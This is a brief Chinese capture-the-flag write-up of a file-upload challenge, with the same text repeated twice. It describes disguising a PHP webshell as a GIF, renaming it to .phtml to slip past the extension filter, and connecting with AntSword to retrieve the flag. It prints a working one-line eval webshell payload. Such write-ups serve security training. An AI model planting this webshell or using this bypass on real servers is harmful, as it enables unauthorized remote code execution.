同样是一道上传题,上传已有木马
换gif木马重新尝试
上传成功,打开指定网址查看是否有上传文件
果然有
接着打开蚁剑连接,发现
上传的图片中的代码不能用
换方法
随便上传一个图片,然后修改其后缀和内容
改为php后,不通过,则改为phtml
并插入代码
1 | GIF89a? <script language="php">eval($_REQUEST[1])</script> |
如图
提交后
进入蚁剑连接
在根目录下得到flag
同样是一道上传题,上传已有木马
换gif木马重新尝试
上传成功,打开指定网址查看是否有上传文件
果然有
接着打开蚁剑连接,发现
上传的图片中的代码不能用
换方法
随便上传一个图片,然后修改其后缀和内容
改为php后,不通过,则改为phtml
并插入代码
1 | GIF89a? <script language="php">eval($_REQUEST[1])</script> |
如图
提交后
进入蚁剑连接
在根目录下得到flag